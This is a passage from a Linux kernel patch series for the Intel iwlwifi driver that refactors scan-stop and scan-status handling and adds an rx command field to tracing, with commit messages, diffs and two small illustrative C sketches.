vif, ¶ms); + ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, IWL_MVM_SCAN_SCHED); } else { hcmd.id = SCAN_OFFLOAD_REQUEST_CMD; ret = iwl_mvm_scan_lmac(mvm, vif, ¶ms); @@ -1447,13 +1393,10 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = !!(uid & IWL_MVM_SCAN_SCHED); - int uid_idx = iwl_mvm_find_scan_uid(mvm, uid); + bool sched = (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED); - /* - * Scan uid may be set to zero in case of scan abort request from above. 
- */ - if (uid_idx >= mvm->max_scans) + /* the status may be already zero in case of scan abort from above */ + if (mvm->scan_uid_status[uid] == 0) return 0; IWL_DEBUG_SCAN(mvm, @@ -1467,14 +1410,14 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, if (notif->ebs_status) mvm->last_ebs_successful = false; - mvm->scan_uid[uid_idx] = 0; + mvm->scan_uid_status[uid] = 0; if (!sched) { ieee80211_scan_completed(mvm->hw, notif->status == IWL_SCAN_OFFLOAD_ABORTED); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } else if (!iwl_mvm_find_scan_type(mvm, IWL_MVM_SCAN_SCHED)) { + } else if (iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED) < 0) { ieee80211_sched_scan_stopped(mvm->hw); } else { IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); @@ -1506,12 +1449,11 @@ static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, struct iwl_umac_scan_done *scan_done = data; struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - int uid_idx = iwl_mvm_find_scan_uid(scan_done->mvm, uid); if (WARN_ON(pkt->hdr.cmd != SCAN_COMPLETE_UMAC)) return false; - if (uid_idx >= scan_done->mvm->max_scans) + if (scan_done->mvm->scan_uid_status[uid] == 0) return false; /* @@ -1519,12 +1461,12 @@ static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, * in FW so the RX handler does nothing. Set last_ebs_successful here if * needed. */ - scan_done->mvm->scan_uid[uid_idx] = 0; + scan_done->mvm->scan_uid_status[uid] = 0; if (notif->ebs_status) scan_done->mvm->last_ebs_successful = false; - return !iwl_mvm_find_scan_type(scan_done->mvm, scan_done->type); + return iwl_mvm_scan_uid_by_status(scan_done->mvm, scan_done->type) < 0; } static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) @@ -1560,10 +1502,10 @@ static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); for (i = 0; i < mvm->max_scans; i++) { - if (mvm->scan_uid[i] & type) { + if (mvm->scan_uid_status[i] == type) { int err; - err = iwl_umac_scan_abort_one(mvm, mvm->scan_uid[i]); + err = iwl_umac_scan_abort_one(mvm, i); if (!err) ret = 0; } @@ -1601,17 +1543,17 @@ int iwl_mvm_scan_size(struct iwl_mvm *mvm) void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) { if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { - u32 uid, i; + int uid, i; - uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_REGULAR); - if (uid < mvm->max_scans) { + uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_REGULAR); + if (uid >= 0) { ieee80211_scan_completed(mvm->hw, true); - mvm->scan_uid[uid] = 0; + mvm->scan_uid_status[uid] = 0; } - uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_SCHED); - if (uid < mvm->max_scans && !mvm->restart_fw) { + uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED); + if (uid >= 0 && !mvm->restart_fw) { ieee80211_sched_scan_stopped(mvm->hw); - mvm->scan_uid[uid] = 0; + mvm->scan_uid_status[uid] = 0; } /* We shouldn't have any UIDs still set. Loop over all the @@ -1619,10 +1561,10 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) * any is found. 
*/ for (i = 0; i < mvm->max_scans; i++) { - if (WARN_ONCE(mvm->scan_uid[i], - "UMAC scan UID %d was not cleaned\n", - mvm->scan_uid[i])) - mvm->scan_uid[i] = 0; + if (WARN_ONCE(mvm->scan_uid_status[i], + "UMAC scan UID %d status was not cleaned\n", + i)) + mvm->scan_uid_status[i] = 0; } } else { if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) From 434f3c1bd5571b54e6684194fcb9fd78641fcc78 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 14:41:44 +0300 Subject: [PATCH 387/872] iwlwifi: mvm: remove code that stops multiple UMAC scans of a type We can only have one scan per type at the same time, so the code that tries to stop several scans of a type is unnecessary. Remove that to reduce code complexity. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 74 +++++++------------------ 1 file changed, 21 insertions(+), 53 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 496d1dfe4f7b..4199c602b7cd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -898,13 +898,6 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -/* UMAC scan API */ - -struct iwl_umac_scan_done { - struct iwl_mvm *mvm; - int type; -}; - static int rate_to_scan_rate_flag(unsigned int rate) { static const int rate_to_scan_rate[IWL_RATE_COUNT] = { @@ -1443,76 +1436,51 @@ int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, return 0; } -static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, - struct iwl_rx_packet *pkt, void *data) -{ - struct iwl_umac_scan_done *scan_done = data; - struct iwl_umac_scan_complete *notif = (void *)pkt->data; - u32 uid = __le32_to_cpu(notif->uid); - - if (WARN_ON(pkt->hdr.cmd != SCAN_COMPLETE_UMAC)) - return false; - - if (scan_done->mvm->scan_uid_status[uid] == 0) - return false; - - /* - * Clear scan uid of scans that was aborted from above and completed - * in FW so the RX handler does nothing. Set last_ebs_successful here if - * needed. - */ - scan_done->mvm->scan_uid_status[uid] = 0; - - if (notif->ebs_status) - scan_done->mvm->last_ebs_successful = false; - - return iwl_mvm_scan_uid_by_status(scan_done->mvm, scan_done->type) < 0; -} - -static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) +static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) { struct iwl_umac_scan_abort cmd = { .hdr.size = cpu_to_le16(sizeof(struct iwl_umac_scan_abort) - sizeof(struct iwl_mvm_umac_cmd_hdr)), - .uid = cpu_to_le32(uid), }; + int uid, ret; lockdep_assert_held(&mvm->mutex); + /* We should always get a valid index here, because we already + * checked that this type of scan was running in the generic + * code. 
+ */ + uid = iwl_mvm_scan_uid_by_status(mvm, type); + if (WARN_ON_ONCE(uid < 0)) + return uid; + + cmd.uid = cpu_to_le32(uid); + IWL_DEBUG_SCAN(mvm, "Sending scan abort, uid %u\n", uid); - return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); + ret = iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); + if (!ret) + mvm->scan_uid_status[uid] = 0; + + return ret; } static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; - struct iwl_umac_scan_done scan_done = { - .mvm = mvm, - .type = type, - }; - int i, ret = -EIO; + int ret; iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), - iwl_scan_umac_done_check, &scan_done); + NULL, NULL); IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - for (i = 0; i < mvm->max_scans; i++) { - if (mvm->scan_uid_status[i] == type) { - int err; - - err = iwl_umac_scan_abort_one(mvm, i); - if (!err) - ret = 0; - } - } - + ret = iwl_mvm_umac_scan_abort(mvm, type); if (ret) { - IWL_DEBUG_SCAN(mvm, "Couldn't stop scan\n"); + IWL_DEBUG_SCAN(mvm, "couldn't stop scan type %d\n", type); iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); return ret; } From f2461796af656f7d1b385f8025c81409dfec8a2f Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 15:23:19 +0300 Subject: [PATCH 388/872] iwlwifi: mvm: combine UMAC and LMAC scan_stop functions The UMAC and LMAC scan_stop functions are now nearly identical, so they can be combined into a single function instead. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 57 ++++++------------------- 1 file changed, 13 insertions(+), 44 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 4199c602b7cd..49bcf7d56d49 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -557,7 +557,7 @@ static bool iwl_mvm_scan_pass_all(struct iwl_mvm *mvm, return true; } -static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) +static int iwl_mvm_lmac_scan_abort(struct iwl_mvm *mvm) { int ret; struct iwl_host_cmd cmd = { @@ -584,36 +584,6 @@ static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) return ret; } -static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) -{ - int ret; - struct iwl_notification_wait wait_scan_done; - static const u8 scan_done_notif[] = { SCAN_OFFLOAD_COMPLETE, }; - bool sched = type & IWL_MVM_SCAN_SCHED; - - lockdep_assert_held(&mvm->mutex); - - iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, - scan_done_notif, - ARRAY_SIZE(scan_done_notif), - NULL, NULL); - - ret = iwl_mvm_send_lmac_scan_abort(mvm); - if (ret) { - IWL_DEBUG_SCAN(mvm, "Send stop %sscan failed %d\n", - sched ? "offloaded " : "", ret); - iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); - goto out; - } - - IWL_DEBUG_SCAN(mvm, "Successfully sent stop %sscan\n", - sched ? 
"scheduled " : ""); - - ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); -out: - return ret; -} - static void iwl_mvm_scan_fill_tx_cmd(struct iwl_mvm *mvm, struct iwl_scan_req_tx_cmd *tx_cmd, bool no_cck) @@ -1465,12 +1435,15 @@ static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) return ret; } -static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) +static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; - static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; + static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, + SCAN_OFFLOAD_COMPLETE, }; int ret; + lockdep_assert_held(&mvm->mutex); + iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), @@ -1478,7 +1451,11 @@ static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - ret = iwl_mvm_umac_scan_abort(mvm, type); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_abort(mvm, type); + else + ret = iwl_mvm_lmac_scan_abort(mvm); + if (ret) { IWL_DEBUG_SCAN(mvm, "couldn't stop scan type %d\n", type); iwl_remove_notification(&mvm->notif_wait, &wait_scan_done); @@ -1559,11 +1536,7 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - + ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_REGULAR); if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; out: @@ -1593,11 +1566,7 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) goto out; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - + ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_SCHED); if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; out: From 7ccc72410d34911537ddd0a502b4a04472e6e6af Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Thu, 14 May 2015 07:55:32 +0300 Subject: [PATCH 389/872] iwlwifi: pcie: Remove redundant check for family type This check for family type is redundant as the if clause above checks a family-dependent Boolean (which is not set for family 8000 anyway). Signed-off-by: Avri Altman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/tx.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c index 06952aadfd7b..2b06f9933b20 100644 --- a/drivers/net/wireless/iwlwifi/pcie/tx.c +++ b/drivers/net/wireless/iwlwifi/pcie/tx.c @@ -1053,8 +1053,6 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, if (trans->cfg->base_params->apmg_wake_up_wa) { __iwl_trans_pcie_set_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) - udelay(2); ret = iwl_poll_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_VAL_MAC_ACCESS_EN, From 65f4a8e0a8ebfc0b4a3ed29394c578e4818021ba Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Mon, 11 May 2015 15:51:22 +0300 Subject: [PATCH 390/872] iwlwifi: tracing: add rx cmd header fields Having explicit rx cmd header fields is useful, as it can be used for event filtering (e.g. 
saving only debug logs, rather than the whole data) Signed-off-by: Eliad Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h b/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h index 223b8752f924..948ce0802fa7 100644 --- a/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h +++ b/drivers/net/wireless/iwlwifi/iwl-devtrace-iwlwifi.h @@ -1,6 +1,7 @@ /****************************************************************************** * * Copyright(c) 2009 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as @@ -64,19 +65,21 @@ TRACE_EVENT(iwlwifi_dev_hcmd, TRACE_EVENT(iwlwifi_dev_rx, TP_PROTO(const struct device *dev, const struct iwl_trans *trans, - void *rxbuf, size_t len), - TP_ARGS(dev, trans, rxbuf, len), + struct iwl_rx_packet *pkt, size_t len), + TP_ARGS(dev, trans, pkt, len), TP_STRUCT__entry( DEV_ENTRY - __dynamic_array(u8, rxbuf, iwl_rx_trace_len(trans, rxbuf, len)) + __field(u8, cmd) + __dynamic_array(u8, rxbuf, iwl_rx_trace_len(trans, pkt, len)) ), TP_fast_assign( DEV_ASSIGN; - memcpy(__get_dynamic_array(rxbuf), rxbuf, - iwl_rx_trace_len(trans, rxbuf, len)); + __entry->cmd = pkt->hdr.cmd; + memcpy(__get_dynamic_array(rxbuf), pkt, + iwl_rx_trace_len(trans, pkt, len)); ), TP_printk("[%s] RX cmd %#.2x", - __get_str(dev), ((u8 *)__get_dynamic_array(rxbuf))[4]) + __get_str(dev), __entry->cmd) ); TRACE_EVENT(iwlwifi_dev_tx, From c7d42480d799ab3242103427f2619b419d885f5e Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 16:00:26 +0300 Subject: [PATCH 391/872] iwlwifi: mvm: combine regular and sched scan stop functions The regular and scheduled scan functions are very similar, so they can be combined into one. 
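To illustrate the direction of this refactor, here is a minimal, self-contained C sketch (illustrative names only, not the driver's actual API) of a single stop helper keyed on the scan type, where only the notification sent back to the stack differs:

#include <stdio.h>

/* Illustrative scan-type flags standing in for the IWL_MVM_SCAN_* bits. */
#define SCAN_REGULAR (1u << 0)
#define SCAN_SCHED   (1u << 1)

static unsigned int scan_status;

/* One stop helper instead of two near-identical ones: the common flow
 * (check, clear the running bit) is shared, and only the notification
 * depends on the scan type. */
static int scan_stop(unsigned int type, int notify)
{
	if (!(scan_status & type))
		return 0;		/* nothing of this type is running */

	scan_status &= ~type;

	if (notify) {
		if (type == SCAN_REGULAR)
			printf("notify stack: regular scan completed\n");
		else
			printf("notify stack: sched scan stopped\n");
	}
	return 0;
}

int main(void)
{
	scan_status = SCAN_REGULAR | SCAN_SCHED;
	scan_stop(SCAN_REGULAR, 1);
	scan_stop(SCAN_SCHED, 1);
	return 0;
}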
Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 7 +-- drivers/net/wireless/iwlwifi/mvm/mvm.h | 9 ++-- drivers/net/wireless/iwlwifi/mvm/scan.c | 50 +++++++-------------- 4 files changed, 27 insertions(+), 41 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index ceffc78ff15b..423c519f06bc 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -761,7 +761,7 @@ void iwl_mvm_set_last_nonqos_seq(struct iwl_mvm *mvm, struct ieee80211_vif *vif) static int iwl_mvm_switch_to_d3(struct iwl_mvm *mvm) { - iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index cea236b6c2ed..d3af88bcff80 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -510,6 +510,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->wiphy->max_scan_ssids = PROBE_OPTION_MAX; + BUILD_BUG_ON(IWL_MVM_SCAN_STOPPING_MASK & IWL_MVM_SCAN_MASK); BUILD_BUG_ON(IWL_MVM_MAX_UMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK) || IWL_MVM_MAX_LMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK)); @@ -2361,7 +2362,7 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) - iwl_mvm_sched_scan_stop(mvm, true); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, true); switch (vif->type) { case NL80211_IFTYPE_STATION: @@ -2417,7 +2418,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, */ if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) - iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); mutex_unlock(&mvm->mutex); } @@ -2775,7 +2776,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, return 0; } - ret = iwl_mvm_sched_scan_stop(mvm, false); + ret = iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, false); mutex_unlock(&mvm->mutex); iwl_mvm_wait_for_async_handlers(mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index f22d30988c96..0173ad15ed46 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -447,6 +447,8 @@ iwl_mvm_vif_from_mac80211(struct ieee80211_vif *vif) extern const u8 tid_to_mac80211_ac[]; +#define IWL_MVM_SCAN_STOPPING_SHIFT 8 + enum iwl_scan_status { IWL_MVM_SCAN_REGULAR = BIT(0), IWL_MVM_SCAN_SCHED = BIT(1), @@ -463,8 +465,8 @@ enum iwl_scan_status { IWL_MVM_SCAN_NETDETECT_MASK = IWL_MVM_SCAN_NETDETECT | IWL_MVM_SCAN_STOPPING_NETDETECT, - IWL_MVM_SCAN_STOPPING_MASK = 0xff00, - IWL_MVM_SCAN_MASK = 0x00ff, + IWL_MVM_SCAN_STOPPING_MASK = 0xff << IWL_MVM_SCAN_STOPPING_SHIFT, + IWL_MVM_SCAN_MASK = 0xff, }; /** @@ -1121,7 +1123,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_scan_request *req, struct ieee80211_scan_ies *ies); int iwl_mvm_scan_size(struct iwl_mvm *mvm); -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm); +int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify); int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); @@ -1137,7 +1139,6 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct 
cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 49bcf7d56d49..d8de906d3ff2 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1139,11 +1139,11 @@ static int iwl_mvm_check_running_scans(struct iwl_mvm *mvm, int type) case IWL_MVM_SCAN_REGULAR: if (mvm->scan_status & IWL_MVM_SCAN_REGULAR_MASK) return -EBUSY; - return iwl_mvm_sched_scan_stop(mvm, true); + return iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_SCHED, true); case IWL_MVM_SCAN_SCHED: if (mvm->scan_status & IWL_MVM_SCAN_SCHED_MASK) return -EBUSY; - return iwl_mvm_reg_scan_stop(mvm); + iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); case IWL_MVM_SCAN_NETDETECT: /* No need to stop anything for net-detect since the * firmware is restarted anyway. This way, any sched @@ -1524,11 +1524,11 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) } } -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) +int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify) { int ret; - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) + if (!(mvm->scan_status & type)) return 0; if (iwl_mvm_is_radio_killed(mvm)) { @@ -1536,43 +1536,27 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_REGULAR); + ret = iwl_mvm_scan_stop_wait(mvm, type); if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; + mvm->scan_status |= type << IWL_MVM_SCAN_STOPPING_SHIFT; out: /* Clear the scan status so the next scan requests will * succeed and mark the scan as stopping, so that the Rx * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. + * above. */ - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + mvm->scan_status &= ~type; - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - ieee80211_scan_completed(mvm->hw, true); - - return ret; -} - -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - ret = iwl_mvm_scan_stop_wait(mvm, IWL_MVM_SCAN_SCHED); - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; -out: - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - if (notify) + if (type == IWL_MVM_SCAN_REGULAR) { + /* Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + if (notify) + ieee80211_scan_completed(mvm->hw, true); + } else if (notify) { ieee80211_sched_scan_stopped(mvm->hw); + } return ret; } From 8d14ccd878e52f8d1c60fa2f6f10b5921ee8f4f9 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 17:05:30 +0300 Subject: [PATCH 392/872] iwlwifi: mvm: make UMAC scans use the stopping scan status UMAC scans now use the general scan status for almost everything, the only part missing was in the scan complete notifications. Change it to use the stopping flags instead of clearing the flags when the stop comes from above and clean the handler function a bit. 
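A minimal, self-contained C sketch of the encoding idea (placeholder names, not the actual driver code): the same per-UID status word carries either the running type or that type shifted into a "stopping" range, so the completion handler can tell a host-initiated stop from a normal completion:

#include <stdio.h>

#define SCAN_REGULAR        (1u << 0)
#define SCAN_SCHED          (1u << 1)
#define SCAN_STOPPING_SHIFT 8	/* mirrors the IWL_MVM_SCAN_STOPPING_SHIFT idea */

/* What a completion handler would do for a given per-UID status word. */
static void on_scan_complete(unsigned int uid_status)
{
	if (uid_status == SCAN_REGULAR)
		printf("regular scan finished -> notify scan completed\n");
	else if (uid_status == SCAN_SCHED)
		printf("sched scan finished -> notify sched scan stopped\n");
	else
		printf("scan was stopped from above -> nothing to notify\n");
}

int main(void)
{
	unsigned int uid_status = SCAN_SCHED;	/* scan is running */

	on_scan_complete(uid_status);		/* notifies the stack */

	/* a host-initiated abort marks the slot as "stopping" instead of 0 */
	uid_status = SCAN_SCHED << SCAN_STOPPING_SHIFT;
	on_scan_complete(uid_status);		/* stays silent */
	return 0;
}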
Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 32 ++++++++++++------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index d8de906d3ff2..4f4570d5261d 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1356,15 +1356,24 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED); + bool aborted = (notif->status == IWL_SCAN_OFFLOAD_ABORTED); - /* the status may be already zero in case of scan abort from above */ - if (mvm->scan_uid_status[uid] == 0) + if (WARN_ON(!(mvm->scan_uid_status[uid] & mvm->scan_status))) return 0; + /* if the scan is already stopping, we don't need to notify mac80211 */ + if (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_REGULAR) { + ieee80211_scan_completed(mvm->hw, aborted); + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + } else if (mvm->scan_uid_status[uid] == IWL_MVM_SCAN_SCHED) { + ieee80211_sched_scan_stopped(mvm->hw); + } + + mvm->scan_status &= ~mvm->scan_uid_status[uid]; + IWL_DEBUG_SCAN(mvm, - "Scan completed, uid %u type %s, status %s, EBS status %s\n", - uid, sched ? "sched" : "regular", + "Scan completed, uid %u type %u, status %s, EBS status %s\n", + uid, mvm->scan_uid_status[uid], notif->status == IWL_SCAN_OFFLOAD_COMPLETED ? "completed" : "aborted", notif->ebs_status == IWL_SCAN_EBS_SUCCESS ? @@ -1375,17 +1384,6 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, mvm->scan_uid_status[uid] = 0; - if (!sched) { - ieee80211_scan_completed(mvm->hw, - notif->status == - IWL_SCAN_OFFLOAD_ABORTED); - iwl_mvm_unref(mvm, 